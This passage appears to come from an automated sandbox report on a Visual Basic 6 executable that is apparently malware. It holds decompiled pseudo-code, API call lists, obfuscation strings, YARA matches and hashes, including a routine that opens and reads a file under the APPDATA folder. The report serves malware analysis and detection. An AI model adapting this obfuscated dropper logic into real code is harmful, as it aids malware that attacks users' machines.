      							asm("movsb");
      							 *__eax =  *__eax & __eax;
      							 *__eax =  *__eax + __al;
      							 *__eax =  *__eax + __al;
      							asm("invalid");
      							asm("invalid");
      							asm("invalid");
      							asm("invalid");
      							 *__eax =  *__eax + __al;
      							 *__eax =  *__eax + __al;
      							__eax = es;
      							__al = __al &  *__eax;
      							asm("sbb al, 0x20");
      							__edx = __edx + 1;
      							 *__eax =  *__eax + __al;
      							 *__eax =  *__eax + __al;
      							_t23 = __eax + 0x74d8;
      							 *_t23 =  *(__eax + 0x74d8) + __ah;
      							__eflags =  *_t23;
      							goto L8;
      						}
      					}
      				}
      				__al = __al -  *[es:eax];
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				__eflags =  *__eax;
      				if ( *__eax <= 0) goto L11;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				__al = __al |  *__eax;
      				__al = __al + 4;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				__ah = 0x1c;
      				__eax = __eax + 1;
      				 *__eax =  *__eax + __al;
      				asm("lock xor [ecx], al");
      				__bh = __bh + __bh;
      				asm("invalid");
      				 *__eax =  *__eax | __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __eax;
      				 *__eax =  *__eax + __al;
      				__eflags =  *__eax;
      				__al = __al +  *__eax;
      				 *__eax =  *__eax + __al;
      				goto 0x64401a19;
      				asm("sbb al, [eax]");
      				 *__ecx = ds;
      				__eax = __eax + 1;
      				 *((intOrPtr*)(__eax + __ebx + 0x780040)) =  *((intOrPtr*)(__eax + __ebx + 0x780040)) + __dl;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax;
      				 *((intOrPtr*)(__ebx - 0x74000000)) =  *((intOrPtr*)(__ebx - 0x74000000)) + __cl;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				_t31 = __edi + 0x75;
      				 *_t31 =  *(__edi + 0x75) + __ch;
      				__eflags =  *_t31;
      				goto L13;
      				if (__eflags < 0) goto L24;
      				if(__eflags == 0) {
      					asm("outsb");
      					asm("outsb");
      					if (__eflags < 0) goto L18;
      					_push(__ebp);
      					__esi = __esi - 1;
      					__edx = __edx + 1;
      					__edi = __edi - 1;
      					__esp = __esp - 1;
      					__esp = __esp + 1;
      					__ebp =  &_a1;
      					__esi = __esi - 1;
      					 *__eax =  *__eax + __al;
      					_push( &_a1);
      					__esi = __esi - 1;
      					__edx = __edx + 1;
      					__edi = __edi - 1;
      					__esp = __esp - 1;
      					__esp = __esp + 1;
      					__ebp =  &_a1;
      					__esi = __esi - 1;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					_push(__eax);
      					 *__eax =  *__eax + __al;
      					 *((intOrPtr*)(__edx - 0x7bdfc270)) =  *((intOrPtr*)(__edx - 0x7bdfc270)) + __bh;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					__cl = 0;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					asm("fcomp dword [eax]");
      					__eax = __eax + 1;
      					_t35 = __eax + __eax;
      					 *_t35 =  *(__eax + __eax);
      					__eflags =  *_t35;
      					do {
      						 *__eax =  *__eax + __al;
      						 *__eax =  *__eax + __dl;
      						 *__eax =  *__eax + __al;
      						__eflags =  *__eax;
      					} while (__eflags < 0);
      					__eax = __eax & 0xc455f3f4;
      					__eflags = __eax;
      					goto L23;
      				}
      				L24:
      				asm("les eax, [esi-0x4b]");
      				__al =  *0x1d768077;
      				L23:
      				asm("hlt");
      				asm("repe push ebp");
      				goto L24;
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: #100
      • String ID: VB5!6&*
      • API String ID: 1341478452-3593831657
      • Opcode ID: f040c468f3a650f91f403cc4ee9c72371284282e98a4de4585c13c0afe7f240b
      • Instruction ID: 3475721fc5de6470c1ed97adcdd5b59bfb3067c989f60441c82283cf71b8c4e5
      • Opcode Fuzzy Hash: f040c468f3a650f91f403cc4ee9c72371284282e98a4de4585c13c0afe7f240b
      • Instruction Fuzzy Hash: 7A31966244E3C14FC3139BB45D756A17FB0AE63214B1A86EBC4D2CF0B3D228995AD367
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: .s'*$2Kw$CeF:$K]*$`0K>
      • API String ID: 0-3726629715
      • Opcode ID: 19ccf53a9d9bd5721ea7b374dbc8179a3406875ee4c9611d05c3e87d27945e63
      • Instruction ID: 6deb5bdc1a0eebf7589e98973ca3a8d0073de002aa39e1184c64801f2500d1f0
      • Opcode Fuzzy Hash: 19ccf53a9d9bd5721ea7b374dbc8179a3406875ee4c9611d05c3e87d27945e63
      • Instruction Fuzzy Hash: FB82FD71644388DFDBB49F28CC897EAB7B2FF99300F45811ADD899B654D3709A81CB42
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: .s'*$CeF:$K]*$`0K>
      • API String ID: 0-111459093
      • Opcode ID: 4799e0813bb55671bc4ed2b39148d9b60f209fe171a7eb0f808e0ff2280c7511
      • Instruction ID: efeca4d6c3c326641f93791ddf779498860817714f9e6bed30143c9f1dcc4361
      • Opcode Fuzzy Hash: 4799e0813bb55671bc4ed2b39148d9b60f209fe171a7eb0f808e0ff2280c7511
      • Instruction Fuzzy Hash: AE52C971644388DFDBB49F38CC897EABBB2BF59300F454119DD899B620C7749A81CB46
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: I#<
      • API String ID: 0-708874848
      • Opcode ID: a5bd84da16938adeb70bb40c1de00a7e9a62d269bf5d5a3a57cd6496907d7b2a
      • Instruction ID: c08e5eb61b4eb6fa88120c8e15a2a1010134923006ce09ed0b6779acf7009bab
      • Opcode Fuzzy Hash: a5bd84da16938adeb70bb40c1de00a7e9a62d269bf5d5a3a57cd6496907d7b2a
      • Instruction Fuzzy Hash: 4F32E2715483C59FDB35CF38C8D87DA7BA2AF52350F49829AC8998F2D6D7708642CB12
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 57%
      			E00420A6D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20, void* _a24, void* _a28, signed int* _a32) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				intOrPtr _v32;
      				void* _v36;
      				void* _v40;
      				void* _v44;
      				void* _v48;
      				void* _v52;
      				void* _v56;
      				signed int _v60;
      				void* _v64;
      				intOrPtr _v72;
      				char _v80;
      				intOrPtr _v88;
      				char _v96;
      				char _v112;
      				char* _v136;
      				intOrPtr _v144;
      				char* _v152;
      				char _v160;
      				void* _v164;
      				signed int _v168;
      				intOrPtr* _v172;
      				signed int _v176;
      				signed int _v188;
      				signed int _v192;
      				intOrPtr _v196;
      				intOrPtr* _v200;
      				signed int _v204;
      				signed int _v208;
      				short _t125;
      				short _t133;
      				signed int _t136;
      				signed int _t142;
      				signed int _t147;
      				void* _t190;
      				void* _t192;
      				intOrPtr _t193;
      				void* _t194;
      
      				_t193 = _t192 - 0xc;
      				 *[fs:0x0] = _t193;
      				L00401540();
      				_v16 = _t193;
      				_v12 = 0x4014c0;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t190);
      				L004017B6();
      				L004017B6();
      				L004017B6();
      				L004017B6();
      				 *_a32 =  *_a32 & 0x00000000;
      				_push(0xbe);
      				L00401756();
      				L0040183A();
      				_v88 = 0x19;
      				_v96 = 2;
      				_v188 = _v60;
      				_v60 = _v60 & 0x00000000;
      				_v72 = _v188;
      				_v80 = 8;
      				_push( &_v96);
      				_push(0xf9);
      				_push( &_v80);
      				_push( &_v112);
      				L0040168A();
      				_v152 = L"monacanthid";
      				_v160 = 0x8008;
      				_push( &_v112);
      				_t125 =  &_v160;
      				_push(_t125);
      				L00401660();
      				_v164 = _t125;
      				L00401846();
      				_push( &_v112);
      				_push( &_v96);
      				_push( &_v80);
      				_push(3);
      				L00401840();
      				_t194 = _t193 + 0x10;
      				if(_v164 != 0) {
      					_push(_v32);
      					_push(L"Pollenate4");
      					L00401696();
      					L0040183A();
      					_push(0xa7);
      					_push(L"Apokreos");
      					L0040162A();
      					L0040183A();
      					_v192 = _v60;
      					_v60 = _v60 & 0x00000000;
      					_v72 = _v192;
      					_v80 = 8;
      					_push(0xea);
      					_push( &_v80);
      					_push( &_v96);
      					L00401624();
      					_push( &_v96);
      					L00401834();
      					L0040183A();
      					L00401846();
      					_push( &_v96);
      					_push( &_v80);
      					_push(2);
      					L00401840();
      					_t194 = _t194 + 0xc;
      				}
      				_v136 = L"12/12/12";
      				_v144 = 8;
      				L0040184C();
      				_push( &_v80);
      				_push( &_v96);
      				L004015E8();
      				_v152 = 0xc;
      				_v160 = 0x8002;
      				_push( &_v96);
      				_t133 =  &_v160;
      				_push(_t133);
      				L00401738();
      				_v164 = _t133;
      				_push( &_v96);
      				_push( &_v80);
      				_push(2);
      				L00401840();
      				_t136 = _v164;
      				if(_t136 != 0) {
      					_push(L"Sjkler7");
      					_push(L"Antagonistiske");
      					_push(L"ADDEDLY");
      					_push(L"RESELLS");
      					L00401822();
      					if( *0x4223c0 != 0) {
      						_v200 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v200 = 0x4223c0;
      					}
      					_v164 =  *_v200;
      					_t142 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v64);
      					asm("fclex");
      					_v168 = _t142;
      					if(_v168 >= 0) {
      						_v204 = _v204 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v164);
      						_push(_v168);
      						L004017C8();
      						_v204 = _t142;
      					}
      					_v172 = _v64;
      					_t147 =  *((intOrPtr*)( *_v172 + 0x110))(_v172,  &_v60);
      					asm("fclex");
      					_v176 = _t147;
      					if(_v176 >= 0) {
      						_v208 = _v208 & 0x00000000;
      					} else {
      						_push(0x110);
      						_push(0x4025b0);
      						_push(_v172);
      						_push(_v176);
      						L004017C8();
      						_v208 = _t147;
      					}
      					_t136 = _v60;
      					_v196 = _t136;
      					_v60 = _v60 & 0x00000000;
      					L0040183A();
      					L004017C2();
      				}
      				L004017B6();
      				_push(0x420e40);
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t136;
      			}


      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420A8B
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AB5
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AC0
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420ACB
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AD6
      • #525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420AE6
      • __vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420AF0
      • #629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00420B31
      • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420B55
      • __vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420B64
      • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00420B77
      • __vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420B96
      • __vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420BA0
      • #514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420BAF
      • __vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420BB9
      • #513.MSVBVM60(?,00000008,000000EA), ref: 00420BE8
      • __vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420BF1
      • __vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420BFB
      • __vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 00420C03
      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00420C12
      • __vbaVarDup.MSVBVM60 ref: 00420C37
      • #542.MSVBVM60(?,?), ref: 00420C44
      • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00420C68
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00420C7E
      • #690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420CA9
      • __vbaNew2.MSVBVM60(004025A0,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420CC1
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 00420D23
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420D7F
      • __vbaStrMove.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420DA9
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420DB1
      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420DBE
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E0A
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E12
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E1A
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E22
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
      • String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
      • API String ID: 3384239285-254499488
      • Opcode ID: fc87b34e61862f3e923425ea6d11f632ca7021f03a237f4211496be39bfb7b82
      • Instruction ID: 9e22c763273cad41d478ff37d2696e063a43a040969f9efb5dc1aae6e23d41ff
      • Opcode Fuzzy Hash: fc87b34e61862f3e923425ea6d11f632ca7021f03a237f4211496be39bfb7b82
      • Instruction Fuzzy Hash: 8EA1E771E01218AFDB10EF91D886BDEB7B8BF04304F5081AAF505B71A1EB785A49CF59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 53%
      			E0041F40E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				void* _v24;
      				short _v28;
      				short _v32;
      				void* _v36;
      				void* _v40;
      				void* _v44;
      				void* _v48;
      				char _v64;
      				intOrPtr _v72;
      				char _v80;
      				char _v96;
      				char _v112;
      				char* _v136;
      				intOrPtr _v144;
      				intOrPtr _v168;
      				char _v176;
      				void* _v180;
      				short _v184;
      				signed int _v188;
      				intOrPtr* _v192;
      				signed int _v196;
      				intOrPtr* _v204;
      				signed int _v208;
      				signed int _v212;
      				signed int _t90;
      				char* _t99;
      				short _t100;
      				char* _t104;
      				signed int _t119;
      				signed int _t124;
      				intOrPtr _t154;
      
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t154;
      				L00401540();
      				_v12 = _t154;
      				_v8 = 0x4013a0;
      				_v136 = L"appdata";
      				_v144 = 8;
      				L0040184C();
      				_t90 =  &_v64;
      				_push(_t90);
      				L00401642();
      				L0040183A();
      				_push(_t90);
      				_push(L"Picry");
      				L0040172C();
      				asm("sbb eax, eax");
      				_v184 =  ~( ~( ~_t90));
      				L00401846();
      				L00401828();
      				if(_v184 != 0) {
      					_v136 = L"Langfredagene5";
      					_v144 = 8;
      					L0040184C();
      					_push( &_v64);
      					_push( &_v80);
      					L004016BA();
      					_push( &_v80);
      					L00401834();
      					L0040183A();
      					_push( &_v80);
      					_push( &_v64);
      					_push(2);
      					L00401840();
      					_t154 = _t154 + 0xc;
      					if( *0x4223c0 != 0) {
      						_v204 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v204 = 0x4223c0;
      					}
      					_v184 =  *_v204;
      					_t119 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v48);
      					asm("fclex");
      					_v188 = _t119;
      					if(_v188 >= 0) {
      						_v208 = _v208 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v184);
      						_push(_v188);
      						L004017C8();
      						_v208 = _t119;
      					}
      					_v192 = _v48;
      					_t124 =  *((intOrPtr*)( *_v192 + 0x70))(_v192,  &_v180);
      					asm("fclex");
      					_v196 = _t124;
      					if(_v196 >= 0) {
      						_v212 = _v212 & 0x00000000;
      					} else {
      						_push(0x70);
      						_push(0x4025b0);
      						_push(_v192);
      						_push(_v196);
      						L004017C8();
      						_v212 = _t124;
      					}
      					_v28 = _v180;
      					L004017C2();
      				}
      				_v72 = 0x93;
      				_v80 = 2;
      				_v136 = L"SUPERSERIOUS";
      				_v144 = 8;
      				L0040184C();
      				_push( &_v80);
      				_push(0xb2);
      				_push( &_v64);
      				_push( &_v96);
      				L0040168A();
      				_v168 = 0x454add;
      				_v176 = 0x8003;
      				_push( &_v96);
      				_t99 =  &_v112;
      				_push(_t99);
      				L0040163C();
      				_push(_t99);
      				_t100 =  &_v176;
      				_push(_t100);
      				L00401738();
      				_v184 = _t100;
      				_push( &_v96);
      				_push( &_v80);
      				_push( &_v64);
      				_push(3);
      				L00401840();
      				_t104 = _v184;
      				if(_t104 != 0) {
      					_v136 = L"Skovede1";
      					_v144 = 8;
      					L0040184C();
      					_push( &_v64);
      					_push( &_v80);
      					L00401852();
      					_push( &_v80);
      					L00401834();
      					L0040183A();
      					_push( &_v80);
      					_t104 =  &_v64;
      					_push(_t104);
      					_push(2);
      					L00401840();
      					_push(L"galopbanernes");
      					L004017E0();
      					_push(_t104);
      					L004016B4();
      					L0040183A();
      				}
      				_v32 = 0xd66;
      				_push(0x41f753);
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t104;
      			}


      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F42B
      • __vbaVarDup.MSVBVM60 ref: 0041F45A
      • #667.MSVBVM60(?), ref: 0041F463
      • __vbaStrMove.MSVBVM60(?), ref: 0041F46D
      • __vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F478
      • __vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F48F
      • __vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F497
      • __vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F4C8
      • #518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F4D5
      • __vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F4DE
      • __vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F4E8
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F4F7
      • __vbaNew2.MSVBVM60(004025A0,004223C0), ref: 0041F512
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041F574
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041F5CD
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041F5EF
      • __vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F61F
      • #629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F635
      • __vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F656
      • __vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F663
      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F67D
      • __vbaVarDup.MSVBVM60 ref: 0041F6AD
      • #522.MSVBVM60(?,?), ref: 0041F6BA
      • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F6C3
      • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041F6CD
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F6DC
      • __vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041F6E9
      • __vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041F6EF
      • __vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041F6F9
      • __vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F73D
      • __vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F745
      • __vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F74D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
      • String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
      • API String ID: 1362175604-1043247457
      • Opcode ID: 643d0d9334024c9d47c50dfcf56e03dfeee1a403110a2155a8e72d0d46bc80bc
      • Instruction ID: e41becb712d6e9f7191228b7bf20ac305e8668c1b385e923c000365d7138cc6e
      • Opcode Fuzzy Hash: 643d0d9334024c9d47c50dfcf56e03dfeee1a403110a2155a8e72d0d46bc80bc
      • Instruction Fuzzy Hash: C981E972D00218AADB10EB91CD45FDEB7B9BF04304F5085AAE105B71A1EB785B89CF69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 46%
      			E0041F770(void* __ebx, void* __ecx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v24;
      				short _v28;
      				intOrPtr _v32;
      				void* _v36;
      				void* _v40;
      				void* _v44;
      				char _v60;
      				char _v76;
      				char _v92;
      				char* _v100;
      				char _v108;
      				char* _v116;
      				char _v124;
      				short _v144;
      				signed int _v148;
      				intOrPtr* _v152;
      				signed int _v156;
      				intOrPtr* _v164;
      				signed int _v168;
      				signed int _v172;
      				signed int _t69;
      				signed int _t73;
      				short _t77;
      				char* _t82;
      				intOrPtr _t111;
      
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t111;
      				L00401540();
      				_v12 = _t111;
      				_v8 = 0x4013b0;
      				if( *0x4223c0 != 0) {
      					_v164 = 0x4223c0;
      				} else {
      					_push(0x4223c0);
      					_push(0x4025a0);
      					L004017CE();
      					_v164 = 0x4223c0;
      				}
      				_v144 =  *_v164;
      				_t69 =  *((intOrPtr*)( *_v144 + 0x4c))(_v144,  &_v44);
      				asm("fclex");
      				_v148 = _t69;
      				if(_v148 >= 0) {
      					_v168 = _v168 & 0x00000000;
      				} else {
      					_push(0x4c);
      					_push(0x402590);
      					_push(_v144);
      					_push(_v148);
      					L004017C8();
      					_v168 = _t69;
      				}
      				_v152 = _v44;
      				_t73 =  *((intOrPtr*)( *_v152 + 0x28))(_v152);
      				asm("fclex");
      				_v156 = _t73;
      				if(_v156 >= 0) {
      					_v172 = _v172 & 0x00000000;
      				} else {
      					_push(0x28);
      					_push(0x402ecc);
      					_push(_v152);
      					_push(_v156);
      					L004017C8();
      					_v172 = _t73;
      				}
      				L004017C2();
      				_push(0x3139);
      				L0040169C();
      				L0040183A();
      				_push(0x64);
      				_push(_v32);
      				L00401750();
      				L0040183A();
      				_push(_t73);
      				_push(L"Sciuroid8");
      				L0040172C();
      				asm("sbb eax, eax");
      				_v144 =  ~( ~( ~_t73));
      				L00401846();
      				_t77 = _v144;
      				if(_t77 != 0) {
      					_v100 = L"appdata";
      					_v108 = 8;
      					L0040184C();
      					_push( &_v60);
      					_push( &_v76);
      					L0040171A();
      					_v116 = L"\\qc17";
      					_v124 = 8;
      					_push( &_v76);
      					_push( &_v124);
      					_t82 =  &_v92;
      					_push(_t82);
      					L00401720();
      					_push(_t82);
      					L00401834();
      					L0040183A();
      					_push(_t82);
      					_push(1);
      					_push(0xffffffff);
      					_push(0x120);
      					L00401726();
      					L00401846();
      					_push( &_v92);
      					_push( &_v76);
      					_push( &_v60);
      					_push(3);
      					L00401840();
      					_push(1);
      					_push( &_v24);
      					_push(0);
      					L00401714();
      					_push(1);
      					L0040170E();
      					_push(0x59);
      					_push( &_v60);
      					L00401708();
      					_t77 =  &_v60;
      					_push(_t77);
      					L00401834();
      					L0040183A();
      					L00401828();
      				}
      				_push(L"Rutiner");
      				L004017EC();
      				_v28 = _t77;
      				_push(0x41f9ec);
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t77;
      			}


      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F78D
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00401546), ref: 0041F7B2
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,0000004C), ref: 0041F814
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 0041F866
      • __vbaFreeObj.MSVBVM60 ref: 0041F87D
      • #697.MSVBVM60(00003139), ref: 0041F887
      • __vbaStrMove.MSVBVM60(00003139), ref: 0041F891
      • #618.MSVBVM60(?,00000064,00003139), ref: 0041F89B
      • __vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041F8A5
      • __vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8B0
      • __vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8C7
      • __vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8EF
      • #666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8FC
      • __vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F91B
      • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F921
      • __vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F92B
      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F93A
      • __vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F942
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041F955
      • __vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041F965
      • __vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041F96C
      • #526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041F977
      • __vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F980
      • __vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F98A
      • __vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F992
      • #696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F99C
